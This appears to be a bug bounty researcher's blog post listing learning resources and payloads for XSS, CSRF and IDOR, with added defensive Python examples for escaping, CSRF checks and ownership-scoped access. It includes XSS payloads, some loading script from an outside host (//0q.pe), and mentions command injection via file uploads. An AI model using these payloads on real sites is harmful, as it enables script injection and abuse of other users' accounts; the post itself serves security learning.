Contents of this blog will continue to change over time; information may be added or removed without notice.
My first vulnerability was submitted to Uber on October 13, 2015. I joined the Synack Red Team (SRT) in January 2017 and shortly afterwards in June 2017 I joined Synack as a Security Analyst.
Bug Bounty Programs
Bug bounty programs are set up by companies who want security researchers to look for vulnerabilities on their assets (web and/or mobile applications, APIs, etc.). Some bug bounties are responsible-disclosure-only programs, but many others will give you a reward for finding vulnerabilities and reporting them. There are platforms out there such as Synack, HackerOne, and BugCrowd. Keep in mind that for Synack you need to go through a vetting process (interview, assessment, and background check) to be able to join, but it is well worth it since reports are usually reviewed and paid out within 24 hours of submission.
Blogs, HackerOne Hacktivity, and Web Hacking 101 by Pete Yaworski have always been my go-to places to learn more about the vulnerabilities out there. The HackerOne Hacktivity page contains a great deal of useful information from all the disclosed reports, and by going through most of them you can get an idea of each vulnerability class out there. You can use the same method as the person in the disclosed report or, better yet, combine your method and their method together to find a vulnerability. This is how you start to learn and develop your knowledge base.
You can view more blogs at: HackerOne - Hacker Blogs We Love Reading
Web Hacking Pro Tips
- Web Hacking 101 by Pete Yaworski
- Breaking into Information Security: Learning the Ropes 101 by Andrew Gill
- Damn Vulnerable Web Application
- OWASP WebGoat
- OWASP Juice Shop v2.23.0 - Instance available on Heroku
- OWASP Vulnerable Web Applications Directory Project
Vulnerabilities & Payloads
This section will continue to change; in it I will be providing different types of payloads you can use for different types of vulnerabilities.
Cross-site Scripting (XSS)
You can use the payload https://unlvcsec.herokuapp.com/#/search?q=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E to execute an alert, which demonstrates XSS. This will also demonstrate access to the DOM and should be shown instead of only using
There will always be different types of scenarios, and you'll have to use a different payload for each one. Here are a couple of examples:
- "><img src=x onerror=alert(document.domain)>
- <script src=//0q.pe>
- <iframe src=//0q.pe>
You can also use a useful tool called XSSHunter which can be used to take your XSS to a whole new level.
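The payloads above all work by breaking out of the context the search term is reflected into (closing an attribute with `">` and then opening a tag). The following added example, which is not code from the original post or from the application it links, shows the other side of that: it decodes the `q` parameter from the post's fragment-routed URL the way a client-side router would, renders it once unsafely and once through `html.escape`, and checks that every payload listed above is neutralised by the safe rendering. The two render functions and the `tag_injected` check are constructed for this example.

```python
import html
from urllib.parse import parse_qs, urlparse

# URL from the post; in a hash-routed app the search term lives in the fragment.
PAGE_URL = ("https://unlvcsec.herokuapp.com/#/search?q="
            "%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E")

# The example payloads from the post, collected here to check the encoder against.
PAYLOADS = [
    '"><script>alert(document.domain)</script>',
    '"><img src=x onerror=alert(document.domain)>',
    "<script src=//0q.pe>",
    "<iframe src=//0q.pe>",
]


def fragment_query(url):
    """Parameters carried in the URL fragment (after '#'), decoded the way a
    client-side router reads them. The fragment is never sent to the server,
    so this value can only be reflected by JavaScript running in the page."""
    fragment = urlparse(url).fragment            # "/search?q=%22%3E%3Cscript..."
    _, _, query = fragment.partition("?")
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_unsafe(q):
    """Vulnerable rendering (constructed): the raw value is concatenated into
    markup, so '">' closes the attribute and '<script>' becomes a live element."""
    return f'<input value="{q}"><p>Results for {q}</p>'


def render_safe(q):
    """Hardened rendering: html.escape(quote=True) encodes & < > " and ', so the
    value can neither close the attribute nor open a tag in the text context."""
    e = html.escape(q, quote=True)
    return f'<input value="{e}"><p>Results for {e}</p>'


def tag_injected(rendered):
    """True if the output contains any tag beyond the template's own three."""
    return rendered.count("<") != 3


if __name__ == "__main__":
    q = fragment_query(PAGE_URL)["q"]
    print("decoded q:", q)
    print("unsafe   :", render_unsafe(q))
    print("safe     :", render_safe(q))
```

Escaping is only the right fix for an HTML text or attribute context; a value that ends up inside a script block, a URL, or a CSS value needs the encoding for that context, which is why the post's point about trying different payloads per scenario matters just as much for the defender.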
Cross-site Request Forgery (CSRF)
OWASP 2013 Top 10 - CSRF
CSRF allows an attacker to perform a sensitive action on another user's account without their consent if the victim visits a website or link controlled by the attacker and the target website does not provide CSRF protection such as a CSRF token or an Authorization header.
You can easily create a CSRF proof of concept by selecting the request and choosing right click -> Engagement Tools -> Generate CSRF PoC.
There will also be situations where the request will contain JSON and a regular CSRF proof of concept will not work.
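To make the protections named above concrete, here is an added example of a server-side CSRF check; it is not code from the original post. It is written against a constructed request dictionary standing in for a framework request object, with `TRUSTED_ORIGIN`, `make_request` and the `X-CSRF-Token` header name all being assumptions of this example. It covers the form case (hidden token field), the JSON case the post mentions (a cross-site HTML form cannot send `application/json`, and cannot set a custom header), a bearer `Authorization` header, and an Origin/Referer mismatch.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Origin of the application itself (constructed for this example).
TRUSTED_ORIGIN = "https://app.example"


def new_csrf_token():
    """Per-session secret kept server-side and handed to the client."""
    return secrets.token_urlsafe(32)


def make_request(method, headers=None, form=None):
    """Constructed stand-in for a framework request object."""
    return {"method": method, "headers": headers or {}, "form": form or {}}


def csrf_check(request, session):
    """Return True if this request is allowed to change state."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True                      # safe methods must not change state
    headers = {k.lower(): v for k, v in request["headers"].items()}

    # 1. A forged request from another site carries that site as Origin/Referer.
    source = headers.get("origin") or headers.get("referer", "")
    if source:
        p = urlparse(source)
        if f"{p.scheme}://{p.netloc}" != TRUSTED_ORIGIN:
            return False

    # 2. A bearer token is attached by script; the browser never adds it on its own.
    if headers.get("authorization", "").startswith("Bearer "):
        return True

    expected = session.get("csrf_token")
    if not expected:
        return False

    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/json":
        # 3. JSON endpoint: an HTML form can only send form-urlencoded, multipart
        # or text/plain, so a JSON-looking body smuggled through a form never
        # reaches this branch; the token must also arrive in a custom header.
        supplied = headers.get("x-csrf-token", "")
    else:
        # 4. Classic form post: the token comes back as a hidden field.
        supplied = request["form"].get("csrf_token", "")

    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(supplied, expected)
```

The reason the content-type branch matters is the situation the post describes: if a JSON endpoint also accepts `text/plain` or form-encoded bodies and parses them as JSON, a plain HTML form can reproduce the request, and the only remaining barrier is the token or custom header that a cross-site form cannot supply.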
Insecure Direct Object Reference (IDOR)
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
For example, the following HTTP request contains the parameter article_id in the body; when you change the value 42872819 you are able to rate the transaction for another user.
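The fix for this class of bug is an authorization check tied to the authenticated user, not validation of the id itself. The added example below, which is not code from the original post or the application it describes, shows a vulnerable rating handler next to a hardened one over a constructed in-memory store (the `Rating` record, the owner names and the second id are all assumptions; 42872819 is the id from the post's example).

```python
from copy import deepcopy
from dataclasses import dataclass


@dataclass
class Rating:
    article_id: int
    owner: str          # user whose transaction this rating belongs to
    stars: int = 0


# Constructed sample store keyed by article_id.
SAMPLE_RATINGS = {
    42872819: Rating(42872819, owner="alice"),
    42872820: Rating(42872820, owner="bob"),
}


def fresh_store():
    """Independent copy of the sample data so each call starts clean."""
    return deepcopy(SAMPLE_RATINGS)


def rate_vulnerable(store, current_user, article_id, stars):
    """Vulnerable handler: article_id from the request body is used as-is, so a
    logged-in user who changes the number rates someone else's transaction."""
    rating = store[article_id]          # no check that current_user owns it
    rating.stars = stars
    return rating


def rate_fixed(store, current_user, article_id, stars):
    """Hardened handler: the lookup is scoped to the authenticated user. An id
    owned by someone else is treated exactly like a non-existent id, so the
    response does not reveal whether the record exists."""
    rating = store.get(article_id)
    if rating is None or rating.owner != current_user:
        raise PermissionError("rating not found")
    rating.stars = stars
    return rating


if __name__ == "__main__":
    store = fresh_store()
    print(rate_vulnerable(store, "bob", 42872819, 1))   # bob edits alice's record
    try:
        rate_fixed(fresh_store(), "bob", 42872819, 1)
    except PermissionError as exc:
        print("fixed handler:", exc)
```

In a real application the ownership condition belongs in the query itself (for example a `WHERE owner = :current_user` clause) rather than as an after-the-fact comparison, so that every code path that fetches the object inherits the check.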
If you are able to find a file upload location that reveals where your file is being saved, and you are able to access it, you can try achieving command injection.
There are a couple of programs that will accept these WordPress endpoints, which reveal users, and an SWF file that allows 401 basic auth attacks.
When the WordPress instance still contains the swfupload.swf you can go to
http://126.96.36.199 is password protected. To create a password-protected directory, run the following command on your web server, which will create a .htpasswd file.
Then create a .htaccess file in the directory you would like to protect.
The following endpoints may allow you to recover usernames on the WordPress instance.
These endpoints will allow you to obtain the users registered in the WordPress instance.